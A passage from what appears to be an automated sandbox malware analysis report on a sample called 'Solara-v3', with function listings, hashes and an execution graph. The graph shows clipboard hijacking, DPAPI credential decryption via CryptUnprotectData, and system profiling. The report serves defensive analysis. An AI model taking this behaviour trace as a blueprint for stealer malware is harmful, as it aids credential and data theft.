                                                                                                                                                                                                                                              • Concurrency::details::_Release_chore.LIBCPMT ref: 00C97526
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C97561
                                                                                                                                                                                                                                                • Part of subcall function 00C9AF37: CreateThreadpoolWork.KERNEL32(00C9B060,00C98A2A,00000000,00000000,?,00C98A2A,?,?,?,?), ref: 00C9AF46
                                                                                                                                                                                                                                                • Part of subcall function 00C9AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00C9AF53
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                                                                                                                              • String ID: Fail to schedule the chore!
                                                                                                                                                                                                                                              • API String ID: 3683891980-3313369819
                                                                                                                                                                                                                                              • Opcode ID: eb63b4eec781dd357013bdb583d355303bf5ef93b676fa650a75c3f5086628ee
                                                                                                                                                                                                                                              • Instruction ID: 1870c8d1ea76ca8815421209b1f4336e3feae7f492e31dcf20959ec299be899d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb63b4eec781dd357013bdb583d355303bf5ef93b676fa650a75c3f5086628ee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B519DB1911218DFCF05DF94D948BAEBBB0FF08314F144229E81A6B391D775AA05CF91
                                                                                                                                                                                                                                              Function 00CAB992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00CAB893,?,?,00000000,00000000,00000000,?), ref: 00CAB9B7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                              • Opcode ID: f65bfb113ff30c3b714969de0f2a4e980fdf47b3db7a78968be73adf66ecfe18
                                                                                                                                                                                                                                              • Instruction ID: e80d0cf6610c124bb625fe88371f26ab797a988f92c948693c49de585d517636
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f65bfb113ff30c3b714969de0f2a4e980fdf47b3db7a78968be73adf66ecfe18
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50417C7190020AAFCF15DFA4CC81AEEBBB5FF49308F188159F924A7212D3359E50EB51
                                                                                                                                                                                                                                              Function 00C93E90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C93EC6
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C94002
                                                                                                                                                                                                                                                • Part of subcall function 00C9ABC5: _Yarn.LIBCPMT ref: 00C9ABE5
                                                                                                                                                                                                                                                • Part of subcall function 00C9ABC5: _Yarn.LIBCPMT ref: 00C9AC09
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                                              • API String ID: 2070049627-1405518554
                                                                                                                                                                                                                                              • Opcode ID: 2d94836b698859e84160d5622d8a86a22570ae2c03d8ca7d88826df976bf07a3
                                                                                                                                                                                                                                              • Instruction ID: ae366999bdcb40a1702a43e072b566ec46888b6a879336fde06ac6f3e84d8a84
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d94836b698859e84160d5622d8a86a22570ae2c03d8ca7d88826df976bf07a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D44162F1A007459BEB10DF69D80AB57BBF8BF04714F044628E4499B781E77AE618CBE1
                                                                                                                                                                                                                                              Function 00CAB1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CAB475
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                              • Opcode ID: 31314a6a96ef9c1f8b4b78bdbdc73c17d62e64b2ee579497507bfaedcf581e08
                                                                                                                                                                                                                                              • Instruction ID: b8d88eb3e92f490ed51751adbb3ef6df764c1ebcd3433037fd316e02aa15707c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31314a6a96ef9c1f8b4b78bdbdc73c17d62e64b2ee579497507bfaedcf581e08
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7231E971800217EFCF269F51CC409EA7B66FF0A31DB18465AF86449123C336DEA1EB81
                                                                                                                                                                                                                                              Function 00C9B831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00C9B8B9
                                                                                                                                                                                                                                              • RaiseException.KERNEL32(?,?,?,?,?), ref: 00C9B8DE
                                                                                                                                                                                                                                                • Part of subcall function 00CA060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C9F354,00000000,?,?,?,00C9F354,00C93D4A,00CC759C,00C93D4A), ref: 00CA066D
                                                                                                                                                                                                                                                • Part of subcall function 00CA8353: IsProcessorFeaturePresent.KERNEL32(00000017,00CA378B,?,?,?,?,00000000,?,?,?,00C9B5AC,00C9B4E0,00000000,?,?,00C9B4E0), ref: 00CA836F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 6ff9c71327f3231840d0a79095fc738612cf4fa7e8348c4b59b41763dd6d68c7
                                                                                                                                                                                                                                              • Instruction ID: 2c8d3b34e75c3408a7a90ce20f8c63a488ac363cbf43403c56cd2b06a4434a9f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ff9c71327f3231840d0a79095fc738612cf4fa7e8348c4b59b41763dd6d68c7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54217F31D0021CFBCF24DF95EA49AEEB7B9AF48710F150419E415AB190CB70AE55DB85
                                                                                                                                                                                                                                              Function 00C9B46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C92673
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                                                                                                                              • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                              • Opcode ID: 3d1624dfd44db0ca4bb6f0823fbb021a7de18ebadf11507ad7e88686fc773e1e
                                                                                                                                                                                                                                              • Instruction ID: d681f029b47fccf35ee862b4936b741f3b12fdf5de77f81a3796146aa74c0606
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d1624dfd44db0ca4bb6f0823fbb021a7de18ebadf11507ad7e88686fc773e1e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F401BCF1518302ABDB04AF28E846B5A7BE8AF0431CF11892CF46A8B301E375ED04CB81
                                                                                                                                                                                                                                              Function 00C92610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CA060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C9F354,00000000,?,?,?,00C9F354,00C93D4A,00CC759C,00C93D4A), ref: 00CA066D
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C92673
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                              • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                              • Opcode ID: 0e69ec1ec002993ecd6df679e9041e344936b1c3367141862c07f00da310e955
                                                                                                                                                                                                                                              • Instruction ID: 0ed3e70b5fcd0cd8eda0fbb1df72430f30941dca63ef91826a6485cba9964c93
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e69ec1ec002993ecd6df679e9041e344936b1c3367141862c07f00da310e955
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4F0F8F1514301ABDB04AF18E846B4BBBE4EB5575CF11881CF5999B300E3B5D844CB92

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:9.7%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:5.5%
                                                                                                                                                                                                                                              Signature Coverage:54.3%
                                                                                                                                                                                                                                              Total number of Nodes:291
                                                                                                                                                                                                                                              Total number of Limit Nodes:21
                                                                                                                                                                                                                                              execution_graph 13952 4086c0 13954 4086cd 13952->13954 13953 4087f7 ExitProcess 13954->13953 13955 4087e0 13954->13955 13956 4086e2 GetCurrentProcessId GetCurrentThreadId SHGetSpecialFolderPathW 13954->13956 13959 4087e9 13955->13959 13958 408710 13956->13958 13967 43b180 13958->13967 13971 43cca0 13959->13971 13961 408749 GetForegroundWindow 13963 4087cf 13961->13963 13963->13955 13970 40cbe0 CoInitializeEx 13963->13970 13974 43e6b0 13967->13974 13969 43b18a RtlAllocateHeap 13969->13961 13976 43e690 13971->13976 13973 43cca5 FreeLibrary 13973->13953 13975 43e6c0 13974->13975 13975->13969 13975->13975 13977 43e699 13976->13977 13977->13973 13978 40e042 13982 409570 13978->13982 13980 40e04e CoUninitialize 13981 40e070 13980->13981 13983 409584 13982->13983 13983->13980 14237 43ce81 GetForegroundWindow 14238 43ceaa 14237->14238 13984 5851000 13985 5851102 13984->13985 13986 5851012 13984->13986 13987 5851030 Sleep 13986->13987 13988 585103a OpenClipboard 13986->13988 13987->13986 13989 58510f9 GetClipboardSequenceNumber 13988->13989 13990 585104a GetClipboardData 13988->13990 13989->13986 13991 58510f3 CloseClipboard 13990->13991 13992 585105a GlobalLock 13990->13992 13991->13989 13992->13991 13993 585106b GlobalAlloc 13992->13993 13995 585109d GlobalLock 13993->13995 13996 58510e9 GlobalUnlock 13993->13996 13997 58510b0 13995->13997 13996->13991 13998 58510b9 GlobalUnlock 13997->13998 13999 58510e0 GlobalFree 13998->13999 14000 58510cb EmptyClipboard SetClipboardData 13998->14000 13999->13996 14000->13996 14000->13999 14001 410247 14002 41025a 14001->14002 14003 41048f RtlExpandEnvironmentStrings 14002->14003 14007 40ea1d 14002->14007 14004 4104f6 14003->14004 14005 41057a RtlExpandEnvironmentStrings 14004->14005 14004->14007 14005->14007 14008 4105f1 14005->14008 14009 4148a0 14008->14009 14010 4148c0 14009->14010 14014 4400c0 14010->14014 14012 414a2d 14018 440400 14012->14018 14016 4400e0 14014->14016 14015 4401fe 14015->14012 14016->14015 14022 43cd20 LdrInitializeThunk 14016->14022 14019 440420 14018->14019 14019->14019 14020 44047e 14019->14020 14023 43cd20 LdrInitializeThunk 14019->14023 14020->14012 14022->14015 14023->14020 14024 42b6c8 14025 42b6e3 14024->14025 14028 437960 14025->14028 14029 43796e 14028->14029 14031 437a52 14029->14031 14037 43cd20 LdrInitializeThunk 14029->14037 14033 437b58 14031->14033 14035 42b827 14031->14035 14036 43cd20 LdrInitializeThunk 14031->14036 14033->14035 14038 43cd20 LdrInitializeThunk 14033->14038 14036->14031 14037->14029 14038->14033 14039 42bb4d 14041 42bb80 14039->14041 14040 42bc8e 14041->14040 14043 43cd20 LdrInitializeThunk 14041->14043 14043->14040 14239 43328c 14240 433291 14239->14240 14241 4332c7 GetSystemMetrics GetSystemMetrics 14240->14241 14242 433306 14241->14242 14044 43b1d0 14045 43b1f0 14044->14045 14046 43b23e 14045->14046 14054 43cd20 LdrInitializeThunk 14045->14054 14047 43b180 RtlAllocateHeap 14046->14047 14051 43b421 14046->14051 14049 43b2d1 14047->14049 14053 43b33e 14049->14053 14055 43cd20 LdrInitializeThunk 14049->14055 14056 43b1a0 14053->14056 14054->14046 14055->14053 14057 43b1b3 14056->14057 14058 43b1c4 14056->14058 14059 43b1b8 RtlFreeHeap 14057->14059 14058->14051 14059->14058 14243 43fb10 14244 43fb1f 14243->14244 14245 43fc8f 14244->14245 14253 43cd20 LdrInitializeThunk 14244->14253 14246 43fee9 14245->14246 14247 43b180 RtlAllocateHeap 14245->14247 14249 43fd27 14247->14249 14251 43fdee 14249->14251 14254 43cd20 LdrInitializeThunk 14249->14254 14250 43b1a0 RtlFreeHeap 14250->14246 14251->14250 14253->14245 14254->14251 14255 40cc13 CoInitializeSecurity 14060 4404d0 14061 4404f0 14060->14061 14064 44054e 14061->14064 14066 43cd20 LdrInitializeThunk 14061->14066 14062 4405fe 14064->14062 14067 43cd20 LdrInitializeThunk 14064->14067 14066->14064 14067->14062 14068 42ebd5 CoSetProxyBlanket 14069 43d25a 14070 43d270 14069->14070 14072 43d2ef 14070->14072 14076 43cd20 LdrInitializeThunk 14070->14076 14075 43cd20 LdrInitializeThunk 14072->14075 14074 43d402 14075->14074 14076->14072 14077 43d0d9 14078 43d0f0 14077->14078 14078->14078 14079 43d15e 14078->14079 14084 43cd20 LdrInitializeThunk 14078->14084 14083 43cd20 LdrInitializeThunk 14079->14083 14082 43d242 14083->14082 14084->14079 14256 43d81f 14257 43d830 14256->14257 14257->14257 14260 43cd20 LdrInitializeThunk 14257->14260 14259 43d99c 14260->14259 14261 4174a1 14263 417604 14261->14263 14264 417630 14261->14264 14265 4174ad 14261->14265 14263->14264 14267 41caa0 14263->14267 14265->14265 14266 440250 LdrInitializeThunk 14265->14266 14266->14263 14268 41cac4 14267->14268 14270 41cddc 14268->14270 14279 413ce0 14268->14279 14270->14264 14280 413d00 14279->14280 14280->14280 14281 4400c0 LdrInitializeThunk 14280->14281 14282 413dc0 14281->14282 14282->14282 14086 40b262 14087 40b277 14086->14087 14089 40b26e 14086->14089 14088 43ccc0 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap 14087->14088 14087->14089 14088->14087 14090 42ce60 14091 42ce80 14090->14091 14092 42cf78 GetPhysicallyInstalledSystemMemory 14091->14092 14093 42cfb0 14092->14093 14093->14093 14283 426520 14284 426540 14283->14284 14286 42659e 14284->14286 14293 43cd20 LdrInitializeThunk 14284->14293 14285 426982 14286->14285 14288 43b180 RtlAllocateHeap 14286->14288 14290 426632 14288->14290 14289 43b1a0 RtlFreeHeap 14289->14285 14292 4266ae 14290->14292 14294 43cd20 LdrInitializeThunk 14290->14294 14292->14289 14293->14286 14294->14292 14295 420f20 14296 420f2e 14295->14296 14298 420f80 14295->14298 14299 421040 14296->14299 14300 421050 14299->14300 14301 440250 LdrInitializeThunk 14300->14301 14302 42113f 14301->14302 14094 40d263 14095 40d275 14094->14095 14098 437cf0 14095->14098 14097 40d313 14097->14097 14100 437d50 CoCreateInstance 14098->14100 14101 4381fe 14100->14101 14102 437e1e SysAllocString 14100->14102 14104 43820e GetVolumeInformationW 14101->14104 14105 437eb7 14102->14105 14111 438228 14104->14111 14106 437ebf CoSetProxyBlanket 14105->14106 14107 4381ed SysFreeString 14105->14107 14108 4381e3 14106->14108 14109 437edf SysAllocString 14106->14109 14107->14101 14108->14107 14112 437fb0 14109->14112 14111->14097 14112->14112 14113 437fea SysAllocString 14112->14113 14116 438011 14113->14116 14114 4381cb SysFreeString SysFreeString 14114->14108 14115 4381c1 14115->14114 14116->14114 14116->14115 14117 438059 VariantInit 14116->14117 14119 4380b0 14117->14119 14118 4381b0 VariantClear 14118->14115 14119->14118 14303 414e25 14305 414e30 14303->14305 14304 415037 CryptUnprotectData 14304->14305 14305->14304 14120 40e568 14121 40e56e 14120->14121 14124 4116a0 14121->14124 14123 40e577 14134 41172e 14124->14134 14125 41182c 14125->14123 14126 411d88 RtlExpandEnvironmentStrings 14126->14134 14127 41206f RtlExpandEnvironmentStrings 14127->14134 14128 41328c CreateThread 14128->14134 14129 4122c0 RtlExpandEnvironmentStrings 14129->14134 14132 43b1a0 RtlFreeHeap 14132->14134 14133 43cd20 LdrInitializeThunk 14133->14134 14134->14125 14134->14126 14134->14127 14134->14128 14134->14129 14134->14132 14134->14133 14135 43ff00 14134->14135 14139 440650 14134->14139 14136 43ff20 14135->14136 14136->14136 14137 44005e 14136->14137 14145 43cd20 LdrInitializeThunk 14136->14145 14137->14134 14140 440670 14139->14140 14143 4406ce 14140->14143 14146 43cd20 LdrInitializeThunk 14140->14146 14141 44077e 14141->14134 14143->14141 14147 43cd20 LdrInitializeThunk 14143->14147 14145->14137 14146->14143 14147->14141 14148 435b68 14149 435b88 14148->14149 14150 435bf1 14149->14150 14152 43cd20 LdrInitializeThunk 14149->14152 14152->14149 14153 43d5e8 14155 43d4f2 14153->14155 14154 43d59e 14155->14154 14157 43cd20 LdrInitializeThunk 14155->14157 14157->14154 14306 436b2d 14307 436b45 14306->14307 14308 436b5e GetUserDefaultUILanguage 14307->14308 14309 436b77 14308->14309 14310 40a8b0 14313 40a8f0 14310->14313 14311 40accd 14312 43b1a0 RtlFreeHeap 14312->14311 14313->14311 14313->14312 14314 42bab3 14316 42babf GetComputerNameExA 14314->14316 14317 40d4b6 14318 40d53f 14317->14318 14319 40d55e 14317->14319 14318->14319 14321 43cd20 LdrInitializeThunk 14318->14321 14321->14319 14158 423675 14159 423a01 14158->14159 14160 423816 14158->14160 14162 423686 14158->14162 14165 4236be 14158->14165 14166 42383d 14158->14166 14176 4239b9 14158->14176 14181 421570 14159->14181 14160->14159 14160->14166 14160->14176 14163 42369c RtlExpandEnvironmentStrings 14162->14163 14163->14159 14163->14160 14163->14165 14163->14166 14163->14176 14164 423991 GetLogicalDrives 14167 440250 LdrInitializeThunk 14164->14167 14165->14165 14177 440250 14165->14177 14166->14164 14166->14166 14169 4239a8 14167->14169 14170 423d8a RtlExpandEnvironmentStrings 14169->14170 14172 424070 14169->14172 14169->14176 14210 43f450 14169->14210 14170->14169 14170->14172 14170->14176 14196 43f150 14172->14196 14178 440270 14177->14178 14179 4403ae 14178->14179 14220 43cd20 LdrInitializeThunk 14178->14220 14179->14160 14182 4400c0 LdrInitializeThunk 14181->14182 14184 4215b0 14182->14184 14183 421d72 14183->14176 14184->14183 14185 43b180 RtlAllocateHeap 14184->14185 14186 421612 14185->14186 14195 4216cb 14186->14195 14221 43cd20 LdrInitializeThunk 14186->14221 14188 421ca9 14189 43b1a0 RtlFreeHeap 14188->14189 14191 421cbb 14189->14191 14190 43b180 RtlAllocateHeap 14190->14195 14191->14183 14223 43cd20 LdrInitializeThunk 14191->14223 14194 43b1a0 RtlFreeHeap 14194->14195 14195->14188 14195->14190 14195->14194 14222 43cd20 LdrInitializeThunk 14195->14222 14197 43f160 14196->14197 14198 43f1be 14197->14198 14224 43cd20 LdrInitializeThunk 14197->14224 14199 4240a3 14198->14199 14200 43b180 RtlAllocateHeap 14198->14200 14199->14176 14206 43f040 14199->14206 14203 43f280 14200->14203 14202 43b1a0 RtlFreeHeap 14202->14199 14205 43f30f 14203->14205 14225 43cd20 LdrInitializeThunk 14203->14225 14205->14202 14208 43f060 14206->14208 14207 43f11f 14207->14176 14208->14207 14226 43cd20 LdrInitializeThunk 14208->14226 14211 43f470 14210->14211 14212 43f4ce 14211->14212 14227 43cd20 LdrInitializeThunk 14211->14227 14213 43b180 RtlAllocateHeap 14212->14213 14217 43f76c 14212->14217 14215 43f543 14213->14215 14219 43f5be 14215->14219 14228 43cd20 LdrInitializeThunk 14215->14228 14216 43b1a0 RtlFreeHeap 14216->14217 14217->14169 14219->14216 14219->14219 14220->14179 14221->14186 14222->14195 14223->14191 14224->14198 14225->14205 14226->14207 14227->14212 14228->14219 14229 4330fd 14230 433115 14229->14230 14233 4336e0 14230->14233 14234 433719 GetObjectW 14233->14234 14236 43380d 14234->14236

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00423675 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1032COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
